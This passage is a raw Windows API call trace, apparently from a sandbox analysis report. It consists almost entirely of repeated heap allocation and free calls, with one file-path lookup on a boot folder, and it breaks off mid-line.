RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.040] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.040] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.041] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.041] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.042] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.043] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.044] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.044] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.045] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.046] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.046] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0228.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0228.050] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0228.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0228.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 